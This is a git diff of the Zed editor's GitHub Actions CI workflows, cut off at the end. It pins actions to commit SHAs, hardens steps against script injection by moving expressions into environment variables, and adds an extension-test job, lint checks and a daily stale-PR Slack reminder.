nix_build::build_nix::install_nix diff --git a/.github/workflows/run_cron_unit_evals.yml b/.github/workflows/run_cron_unit_evals.yml index e57b54e4f2249b92630b2d3636ce2316a0814625..7bb7f79473eb4dae170eb18edd454b7ae35d13e8 100644 --- a/.github/workflows/run_cron_unit_evals.yml +++ b/.github/workflows/run_cron_unit_evals.yml @@ -16,12 +16,12 @@ jobs: model: - anthropic/claude-sonnet-4-5-latest - anthropic/claude-opus-4-5-latest - - google/gemini-3-pro + - google/gemini-3.1-pro - openai/gpt-5 fail-fast: false steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -29,18 +29,16 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c - name: steps::clear_target_dir_if_large run: ./script/clear-target-dir-if-larger-than 250 - name: steps::setup_sccache diff --git a/.github/workflows/run_tests.yml b/.github/workflows/run_tests.yml index 97e918aab37f3dc375eb259f416f7998b4b196fd..13d036b128666700d45ae39013b2dd8f3da5abf9 100644 --- a/.github/workflows/run_tests.yml +++ b/.github/workflows/run_tests.yml @@ -19,7 +19,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: ${{ github.ref == 'refs/heads/main' && 2 || 350 }} @@ -35,7 +35,7 @@ jobs: git fetch origin "$GITHUB_BASE_REF" --depth=350 COMPARE_REV="$(git merge-base "origin/${GITHUB_BASE_REF}" HEAD)" fi - CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" ${{ github.sha }})" + CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")" check_pattern() { local output_name="$1" @@ -103,23 +103,40 @@ jobs: check_pattern "run_action_checks" '^\.github/(workflows/|actions/|actionlint.yml)|tooling/xtask|script/' -qP check_pattern "run_docs" '^(docs/|crates/.*\.rs)' -qP check_pattern "run_licenses" '^(Cargo.lock|script/.*licenses)' -qP - check_pattern "run_tests" '^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests)))' -qvP + check_pattern "run_tests" '^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests))|extensions/)' -qvP + # Detect changed extension directories (excluding extensions/workflows) + CHANGED_EXTENSIONS=$(echo "$CHANGED_FILES" | grep -oP '^extensions/[^/]+(?=/)' | sort -u | grep -v '^extensions/workflows$' || true) + # Filter out deleted extensions + EXISTING_EXTENSIONS="" + for ext in $CHANGED_EXTENSIONS; do + if [ -f "$ext/extension.toml" ]; then + EXISTING_EXTENSIONS=$(printf '%s\n%s' "$EXISTING_EXTENSIONS" "$ext") + fi + done + CHANGED_EXTENSIONS=$(echo "$EXISTING_EXTENSIONS" | sed '/^$/d') + if [ -n "$CHANGED_EXTENSIONS" ]; then + EXTENSIONS_JSON=$(echo "$CHANGED_EXTENSIONS" | jq -R -s -c 'split("\n") | map(select(length > 0))') + else + EXTENSIONS_JSON="[]" + fi + echo "changed_extensions=$EXTENSIONS_JSON" >> "$GITHUB_OUTPUT" outputs: changed_packages: ${{ steps.filter.outputs.changed_packages }} run_action_checks: ${{ steps.filter.outputs.run_action_checks }} run_docs: ${{ steps.filter.outputs.run_docs }} run_licenses: ${{ steps.filter.outputs.run_licenses }} run_tests: ${{ steps.filter.outputs.run_tests }} + changed_extensions: ${{ steps.filter.outputs.changed_extensions }} check_style: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') runs-on: namespace-profile-4x8-ubuntu-2204 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -139,6 +156,21 @@ jobs: uses: crate-ci/typos@2d0ce569feab1f8752f1dde43cc2f2aa53236e06 with: config: ./typos.toml + - name: run_tests::fetch_ts_query_ls + uses: dsaltares/fetch-gh-release-asset@aa37ae5c44d3c9820bc12fe675e8670ecd93bd1c + with: + repo: ribru17/ts_query_ls + version: tags/v3.15.1 + file: ts_query_ls-x86_64-unknown-linux-gnu.tar.gz + - name: run_tests::run_ts_query_ls + run: |- + tar -xf "$GITHUB_WORKSPACE/ts_query_ls-x86_64-unknown-linux-gnu.tar.gz" -C "$GITHUB_WORKSPACE" + "$GITHUB_WORKSPACE/ts_query_ls" format --check . || { + echo "Found unformatted queries, please format them with ts_query_ls." + echo "For easy use, install the Tree-sitter query extension:" + echo "zed://extension/tree-sitter-query" + false + } timeout-minutes: 60 clippy_windows: needs: @@ -147,7 +179,7 @@ jobs: runs-on: self-32vcpu-windows-2022 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -175,9 +207,12 @@ jobs: - orchestrate if: needs.orchestrate.outputs.run_tests == 'true' runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -185,14 +220,12 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_sccache @@ -214,7 +247,7 @@ jobs: runs-on: namespace-profile-mac-large steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -222,7 +255,7 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -238,6 +271,39 @@ jobs: - name: steps::show_sccache_stats run: sccache --show-stats || true timeout-minutes: 60 + clippy_mac_x86_64: + needs: + - orchestrate + if: needs.orchestrate.outputs.run_tests == 'true' + runs-on: namespace-profile-mac-large + steps: + - name: steps::checkout_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + - name: steps::setup_cargo_config + run: | + mkdir -p ./../.cargo + cp ./.cargo/ci-config.toml ./../.cargo/config.toml + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup + - name: steps::install_rustup_target + run: rustup target add x86_64-apple-darwin + - name: steps::setup_sccache + run: ./script/setup-sccache + env: + R2_ACCOUNT_ID: ${{ secrets.R2_ACCOUNT_ID }} + R2_ACCESS_KEY_ID: ${{ secrets.R2_ACCESS_KEY_ID }} + R2_SECRET_ACCESS_KEY: ${{ secrets.R2_SECRET_ACCESS_KEY }} + SCCACHE_BUCKET: sccache-zed + - name: steps::clippy + run: ./script/clippy --target x86_64-apple-darwin + - name: steps::show_sccache_stats + run: sccache --show-stats || true + timeout-minutes: 60 run_tests_windows: needs: - orchestrate @@ -245,7 +311,7 @@ jobs: runs-on: self-32vcpu-windows-2022 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -285,9 +351,12 @@ jobs: - orchestrate if: needs.orchestrate.outputs.run_tests == 'true' runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -295,14 +364,12 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_node @@ -310,7 +377,7 @@ jobs: with: node-version: '20' - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c - name: steps::clear_target_dir_if_large run: ./script/clear-target-dir-if-larger-than 250 - name: steps::setup_sccache @@ -344,7 +411,7 @@ jobs: runs-on: namespace-profile-mac-large steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -352,7 +419,7 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -361,7 +428,7 @@ jobs: with: node-version: '20' - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c - name: steps::clear_target_dir_if_large run: ./script/clear-target-dir-if-larger-than 300 - name: steps::setup_sccache @@ -373,6 +440,8 @@ jobs: SCCACHE_BUCKET: sccache-zed - name: steps::cargo_nextest run: cargo nextest run --workspace --no-fail-fast --no-tests=warn${{ needs.orchestrate.outputs.changed_packages && format(' -E "{0}"', needs.orchestrate.outputs.changed_packages) || '' }} + - name: steps::cargo_build_visual_tests + run: cargo build -p zed --bin zed_visual_test_runner --features visual-tests - name: steps::show_sccache_stats run: sccache --show-stats || true - name: steps::cleanup_cargo_config @@ -385,20 +454,21 @@ jobs: - orchestrate if: needs.orchestrate.outputs.run_tests == 'true' runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_cargo_config @@ -428,9 +498,12 @@ jobs: - orchestrate if: needs.orchestrate.outputs.run_tests == 'true' runs-on: namespace-profile-8x16-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -438,14 +511,12 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_sccache @@ -473,7 +544,7 @@ jobs: runs-on: namespace-profile-8x16-ubuntu-2204 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -481,7 +552,7 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -510,13 +581,16 @@ jobs: - orchestrate if: needs.orchestrate.outputs.run_tests == 'true' runs-on: namespace-profile-2x4-ubuntu-2404 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -542,9 +616,12 @@ jobs: - orchestrate if: needs.orchestrate.outputs.run_docs == 'true' runs-on: namespace-profile-8x16-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -552,7 +629,7 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -564,8 +641,6 @@ jobs: jobSummary: false - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/generate-action-metadata @@ -592,11 +667,11 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -611,7 +686,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_tests::check_scripts::run_shellcheck @@ -620,8 +695,14 @@ jobs: name: run_tests::check_scripts::download_actionlint run: bash <(curl https://raw.githubusercontent.com/rhysd/actionlint/main/scripts/download-actionlint.bash) - name: run_tests::check_scripts::run_actionlint - run: | - ${{ steps.get_actionlint.outputs.executable }} -color + run: '"$ACTIONLINT_BIN" -color' + env: + ACTIONLINT_BIN: ${{ steps.get_actionlint.outputs.executable }} + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup - name: run_tests::check_scripts::check_xtask_workflows run: | cargo xtask workflows @@ -643,7 +724,7 @@ jobs: GIT_COMMITTER_EMAIL: ci@zed.dev steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 0 @@ -667,7 +748,25 @@ jobs: with: input: crates/proto/proto/ against: https://github.com/${GITHUB_REPOSITORY}.git#branch=${BUF_BASE_BRANCH},subdir=crates/proto/proto/ + - name: run_tests::check_postgres_and_protobuf_migrations::buf_lint + run: buf lint crates/proto/proto + - name: run_tests::check_postgres_and_protobuf_migrations::check_protobuf_formatting + run: buf format --diff --exit-code crates/proto/proto timeout-minutes: 60 + extension_tests: + needs: + - orchestrate + if: needs.orchestrate.outputs.changed_extensions != '[]' + permissions: + contents: read + strategy: + matrix: + extension: ${{ fromJson(needs.orchestrate.outputs.changed_extensions) }} + fail-fast: false + max-parallel: 1 + uses: ./.github/workflows/extension_tests.yml + with: + working-directory: ${{ matrix.extension }} tests_pass: needs: - orchestrate @@ -675,6 +774,7 @@ jobs: - clippy_windows - clippy_linux - clippy_mac + - clippy_mac_x86_64 - run_tests_windows - run_tests_linux - run_tests_mac @@ -685,6 +785,7 @@ jobs: - check_docs - check_licenses - check_scripts + - extension_tests if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') && always() runs-on: namespace-profile-2x4-ubuntu-2404 steps: @@ -698,23 +799,43 @@ jobs: if [[ "$2" != "skipped" && "$2" != "success" ]]; then EXIT_CODE=1; fi } - check_result "orchestrate" "${{ needs.orchestrate.result }}" - check_result "check_style" "${{ needs.check_style.result }}" - check_result "clippy_windows" "${{ needs.clippy_windows.result }}" - check_result "clippy_linux" "${{ needs.clippy_linux.result }}" - check_result "clippy_mac" "${{ needs.clippy_mac.result }}" - check_result "run_tests_windows" "${{ needs.run_tests_windows.result }}" - check_result "run_tests_linux" "${{ needs.run_tests_linux.result }}" - check_result "run_tests_mac" "${{ needs.run_tests_mac.result }}" - check_result "doctests" "${{ needs.doctests.result }}" - check_result "check_workspace_binaries" "${{ needs.check_workspace_binaries.result }}" - check_result "check_wasm" "${{ needs.check_wasm.result }}" - check_result "check_dependencies" "${{ needs.check_dependencies.result }}" - check_result "check_docs" "${{ needs.check_docs.result }}" - check_result "check_licenses" "${{ needs.check_licenses.result }}" - check_result "check_scripts" "${{ needs.check_scripts.result }}" + check_result "orchestrate" "$RESULT_ORCHESTRATE" + check_result "check_style" "$RESULT_CHECK_STYLE" + check_result "clippy_windows" "$RESULT_CLIPPY_WINDOWS" + check_result "clippy_linux" "$RESULT_CLIPPY_LINUX" + check_result "clippy_mac" "$RESULT_CLIPPY_MAC" + check_result "clippy_mac_x86_64" "$RESULT_CLIPPY_MAC_X86_64" + check_result "run_tests_windows" "$RESULT_RUN_TESTS_WINDOWS" + check_result "run_tests_linux" "$RESULT_RUN_TESTS_LINUX" + check_result "run_tests_mac" "$RESULT_RUN_TESTS_MAC" + check_result "doctests" "$RESULT_DOCTESTS" + check_result "check_workspace_binaries" "$RESULT_CHECK_WORKSPACE_BINARIES" + check_result "check_wasm" "$RESULT_CHECK_WASM" + check_result "check_dependencies" "$RESULT_CHECK_DEPENDENCIES" + check_result "check_docs" "$RESULT_CHECK_DOCS" + check_result "check_licenses" "$RESULT_CHECK_LICENSES" + check_result "check_scripts" "$RESULT_CHECK_SCRIPTS" + check_result "extension_tests" "$RESULT_EXTENSION_TESTS" exit $EXIT_CODE + env: + RESULT_ORCHESTRATE: ${{ needs.orchestrate.result }} + RESULT_CHECK_STYLE: ${{ needs.check_style.result }} + RESULT_CLIPPY_WINDOWS: ${{ needs.clippy_windows.result }} + RESULT_CLIPPY_LINUX: ${{ needs.clippy_linux.result }} + RESULT_CLIPPY_MAC: ${{ needs.clippy_mac.result }} + RESULT_CLIPPY_MAC_X86_64: ${{ needs.clippy_mac_x86_64.result }} + RESULT_RUN_TESTS_WINDOWS: ${{ needs.run_tests_windows.result }} + RESULT_RUN_TESTS_LINUX: ${{ needs.run_tests_linux.result }} + RESULT_RUN_TESTS_MAC: ${{ needs.run_tests_mac.result }} + RESULT_DOCTESTS: ${{ needs.doctests.result }} + RESULT_CHECK_WORKSPACE_BINARIES: ${{ needs.check_workspace_binaries.result }} + RESULT_CHECK_WASM: ${{ needs.check_wasm.result }} + RESULT_CHECK_DEPENDENCIES: ${{ needs.check_dependencies.result }} + RESULT_CHECK_DOCS: ${{ needs.check_docs.result }} + RESULT_CHECK_LICENSES: ${{ needs.check_licenses.result }} + RESULT_CHECK_SCRIPTS: ${{ needs.check_scripts.result }} + RESULT_EXTENSION_TESTS: ${{ needs.extension_tests.result }} concurrency: group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} cancel-in-progress: true diff --git a/.github/workflows/run_unit_evals.yml b/.github/workflows/run_unit_evals.yml index 2259d2498b76f3627e6784f55023e2fbfe855cbb..1bf75188832668f40a24c4d3452940bf05fcd3fd 100644 --- a/.github/workflows/run_unit_evals.yml +++ b/.github/workflows/run_unit_evals.yml @@ -24,7 +24,7 @@ jobs: runs-on: namespace-profile-16x32-ubuntu-2204 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -32,18 +32,16 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c - name: steps::clear_target_dir_if_large run: ./script/clear-target-dir-if-larger-than 250 - name: steps::setup_sccache diff --git a/.github/workflows/slack_notify_first_responders.yml b/.github/workflows/slack_notify_first_responders.yml index a6f2d557a574778aea6c2a90f9721b5a41bd0724..538d02b582f18db627693b62e439f4142ea29056 100644 --- a/.github/workflows/slack_notify_first_responders.yml +++ b/.github/workflows/slack_notify_first_responders.yml @@ -17,8 +17,9 @@ jobs: id: check-label env: LABEL_NAME: ${{ github.event.label.name }} + FIRST_RESPONDER_LABELS: ${{ env.FIRST_RESPONDER_LABELS }} run: | - if echo '${{ env.FIRST_RESPONDER_LABELS }}' | jq -e --arg label "$LABEL_NAME" 'index($label) != null' > /dev/null; then + if echo "$FIRST_RESPONDER_LABELS" | jq -e --arg label "$LABEL_NAME" 'index($label) != null' > /dev/null; then echo "should_notify=true" >> "$GITHUB_OUTPUT" echo "Label '$LABEL_NAME' requires first responder notification" else diff --git a/.github/workflows/stale-pr-reminder.yml b/.github/workflows/stale-pr-reminder.yml new file mode 100644 index 0000000000000000000000000000000000000000..1c3c0aec623c68c3c99803ef2421e73dbec9cf8e --- /dev/null +++ b/.github/workflows/stale-pr-reminder.yml @@ -0,0 +1,115 @@ +# Stale PR Review Reminder +# +# Runs daily on weekdays (second run at 8 PM UTC disabled during rollout) and posts a Slack summary of open PRs that +# have been awaiting review for more than 72 hours. Team-level signal only — +# no individual shaming. +# +# Security note: No untrusted input is interpolated into shell commands. +# All PR metadata is read via gh API + jq. +# +# Required secrets: +# SLACK_WEBHOOK_PR_REVIEW_BOT - Incoming webhook URL for the #pr-review-ops channel + +name: Stale PR Review Reminder + +on: + schedule: + - cron: "0 14 * * 1-5" # 2 PM UTC weekdays + # - cron: "0 20 * * 1-5" # 8 PM UTC weekdays — enable after initial rollout + workflow_dispatch: {} + +permissions: + contents: read + pull-requests: read + +jobs: + check-stale-prs: + if: github.repository_owner == 'zed-industries' + runs-on: ubuntu-latest + timeout-minutes: 5 + env: + REPO: ${{ github.repository }} + # Only surface PRs created on or after this date. Update this if the + # review process enforcement date changes. + PROCESS_START_DATE: "2026-03-19T00:00:00Z" + steps: + - name: Find PRs awaiting review longer than 72h + id: stale + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + CUTOFF=$(date -u -v-72H +%Y-%m-%dT%H:%M:%SZ 2>/dev/null \ + || date -u -d '72 hours ago' +%Y-%m-%dT%H:%M:%SZ) + + # Get open, non-draft PRs with pending review requests, created before cutoff + # but after the review process start date (to exclude pre-existing backlog) + gh api --paginate \ + "repos/${REPO}/pulls?state=open&sort=updated&direction=asc&per_page=100" \ + --jq "[ + .[] | + select(.draft == false) | + select(.created_at > \"$PROCESS_START_DATE\") | + select(.created_at < \"$CUTOFF\") | + select((.requested_reviewers | length > 0) or (.requested_teams | length > 0)) + ]" > /tmp/candidates.json + + # Filter to PRs with zero approving reviews + jq -r '.[].number' /tmp/candidates.json | while read -r PR_NUMBER; do + APPROVALS=$(gh api \ + "repos/${REPO}/pulls/${PR_NUMBER}/reviews" \ + --jq "[.[] | select(.state == \"APPROVED\")] | length" 2>/dev/null || echo "0") + + if [ "$APPROVALS" -eq 0 ]; then + jq ".[] | select(.number == ${PR_NUMBER}) | {number, title, author: .user.login, created_at}" \ + /tmp/candidates.json + fi + done | jq -s '.' > /tmp/awaiting.json + + COUNT=$(jq 'length' /tmp/awaiting.json) + echo "count=$COUNT" >> "$GITHUB_OUTPUT" + + - name: Notify Slack + if: steps.stale.outputs.count != '0' + env: + SLACK_WEBHOOK_PR_REVIEW_BOT: ${{ secrets.SLACK_WEBHOOK_PR_REVIEW_BOT }} + COUNT: ${{ steps.stale.outputs.count }} + run: | + # Build Block Kit payload from JSON — no shell interpolation of PR titles. + # Why jq? PR titles are attacker-controllable input. By reading them + # through jq -r from the JSON file and passing the result to jq --arg, + # the content stays safely JSON-encoded in the final payload. + PRS=$(jq -r '.[] | "• — \(.title) (by \(.author), opened \(.created_at | split("T")[0]))"' /tmp/awaiting.json) + + jq -n \ + --arg count "$COUNT" \ + --arg prs "$PRS" \ + '{ + text: ($count + " PR(s) awaiting review for >72 hours"), + blocks: [ + { + type: "section", + text: { + type: "mrkdwn", + text: (":hourglass_flowing_sand: *" + $count + " PR(s) Awaiting Review >72 Hours*") + } + }, + { + type: "section", + text: { type: "mrkdwn", text: $prs } + }, + { type: "divider" }, + { + type: "context", + elements: [{ + type: "mrkdwn", + text: "PRs awaiting review are surfaced daily. Reviewers: pick one up or reassign." + }] + } + ] + }' | \ + curl -s -X POST "$SLACK_WEBHOOK_PR_REVIEW_BOT" \ + -H 'Content-Type: application/json' \ + -d @- +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/track_duplicate_bot_effectiveness.yml b/.github/workflows/track_duplicate_bot_effectiveness.yml index fa1c80616cb6133a7a4cad8841bbaad03115ff58..0d41a6070610ce9e9cc3faa06af78145bc9caec1 100644 --- a/.github/workflows/track_duplicate_bot_effectiveness.yml +++ b/.github/workflows/track_duplicate_bot_effectiveness.yml @@ -22,14 +22,14 @@ jobs: timeout-minutes: 5 steps: - name: Checkout repository - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: sparse-checkout: script/github-track-duplicate-bot-effectiveness.py sparse-checkout-cone-mode: false - name: Get github app token id: get-app-token - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 # v1.11.7 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 with: app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} @@ -61,14 +61,14 @@ jobs: timeout-minutes: 10 steps: - name: Checkout repository - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: sparse-checkout: script/github-track-duplicate-bot-effectiveness.py sparse-checkout-cone-mode: false - name: Get github app token id: get-app-token - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 # v1.11.7 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 with: app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} diff --git a/.github/workflows/update_duplicate_magnets.yml b/.github/workflows/update_duplicate_magnets.yml index 